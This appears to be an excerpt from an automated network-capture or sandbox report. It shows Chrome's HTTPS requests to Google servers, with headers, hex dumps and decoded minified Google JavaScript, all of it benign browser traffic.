                                                                                                                                            Data Ascii: vg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810
                                                                                                                                            2024-10-31 16:12:11 UTC1378INData Raw: 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38
                                                                                                                                            Data Ascii: 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18
                                                                                                                                            2024-10-31 16:12:11 UTC1378INData Raw: 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 35 33 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66
                                                                                                                                            Data Ascii: 2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700253,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(f
                                                                                                                                            2024-10-31 16:12:11 UTC126INData Raw: 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 59 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 59 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 0d 0a
                                                                                                                                            Data Ascii: is.trustedTypes;_.Yd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Zd\u003dnew _.Yd(\"about:invalid#z
                                                                                                                                            2024-10-31 16:12:11 UTC417INData Raw: 31 39 61 0d 0a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 68 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 5b 57 64 28 5c 22 64 61 74 61 5c 22 29 2c 57 64 28 5c 22 68 74 74 70 5c 22 29 2c 57 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 57 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 57 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 56 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 61 65 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e
                                                                                                                                            Data Ascii: 19aClosurez\");_.Vd\u003dclass{constructor(a){this.hh\u003da}};_.$d\u003d[Wd(\"data\"),Wd(\"http\"),Wd(\"https\"),Wd(\"mailto\"),Wd(\"ftp\"),new _.Vd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.ae\u003dclass{constructor(a){this.i\u003da}toString(){return
                                                                                                                                            2024-10-31 16:12:11 UTC1378INData Raw: 38 30 30 30 0d 0a 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 66 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e
                                                                                                                                            Data Ascii: 8000dnull?a:Number.isFinite(a)?a|0:void 0};_.de\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a|0:void 0};fe\u003dfunction
                                                                                                                                            2024-10-31 16:12:11 UTC1378INData Raw: 72 6e 20 5f 2e 63 65 28 5f 2e 59 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 42 62 28 5f 2e 72 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 42 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 65 65 5c 75 30 30 33 64 5f 2e 58 64 3b 5f 2e 69 65 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33
                                                                                                                                            Data Ascii: rn _.ce(_.Yc(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.Bb(_.re(a,b),c)};_.se\u003dfunction(a,b,c\u003d0){return _.Bb(_.S(a,b),c)};_.ue\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};ee\u003d_.Xd;_.ie\u003dclass{constructor(a){this.i\u003


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.449738142.250.185.1004437664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:10 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                            Host: www.google.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2024-10-31 16:12:11 UTC957INHTTP/1.1 200 OK
                                                                                                                                            Version: 690498177
                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:10 GMT
                                                                                                                                            Server: gws
                                                                                                                                            Cache-Control: private
                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Accept-Ranges: none
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Connection: close
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            2024-10-31 16:12:11 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                            2024-10-31 16:12:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.449746142.250.184.2064437664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:14 UTC741OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                            Host: apis.google.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2024-10-31 16:12:14 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                            Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                            Content-Length: 117949
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Server: sffe
                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                            Date: Thu, 31 Oct 2024 14:25:53 GMT
                                                                                                                                            Expires: Fri, 31 Oct 2025 14:25:53 GMT
                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                            Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT
                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Age: 6381
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Connection: close
                                                                                                                                            2024-10-31 16:12:14 UTC464INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e
                                                                                                                                            Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72
                                                                                                                                            Data Ascii: otype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)retur
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73
                                                                                                                                            Data Ascii: r b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.ass
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 3a
                                                                                                                                            Data Ascii: unction(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l||(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject:
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 74
                                                                                                                                            Data Ascii: romise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=funct
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72
                                                                                                                                            Data Ascii: r("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));for
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68
                                                                                                                                            Data Ascii: h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return th
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 2e
                                                                                                                                            Data Ascii: =function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this.
                                                                                                                                            2024-10-31 16:12:14 UTC1378INData Raw: 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65
                                                                                                                                            Data Ascii: e.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)re
